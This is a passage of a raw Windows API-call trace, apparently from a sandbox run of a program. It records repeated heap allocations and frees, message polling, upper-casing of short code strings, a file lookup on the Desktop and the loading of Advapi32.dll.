wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0164.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0164.579] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0164.579] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.579] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0164.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.580] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0164.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.580] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0164.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.580] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0164.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.580] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/FN4XiavIO4PR.bmp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75fbcab0, ftCreationTime.dwHighDateTime=0x1d4caa4, ftLastAccessTime.dwLowDateTime=0xc3226d10, ftLastAccessTime.dwHighDateTime=0x1d4c9d4, ftLastWriteTime.dwLowDateTime=0xc3226d10, ftLastWriteTime.dwHighDateTime=0x1d4c9d4, nFileSizeHigh=0x0, nFileSizeLow=0x20b1, dwReserved0=0xfcb0006, dwReserved1=0xdff8, cFileName="FN4XiavIO4PR.bmp", cAlternateFileName="FN4XIA~1.BMP")) returned 0xaa55e0 [0164.580] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0164.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0164.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.581] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0164.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.582] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.582] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0164.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0164.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0164.583] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0164.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.583] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0164.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0164.584] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0164.584] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0164.584] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.584] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0164.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.585] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0164.585] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0164.585] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0164.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0164.586] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0164.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0164.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0164.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0164.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.588] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0164.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.589] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.589] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.589] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0164.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0164.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0164.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0164.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0164.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.590] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0164.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0164.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0164.590] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0164.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0164.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0164.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0164.591] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | 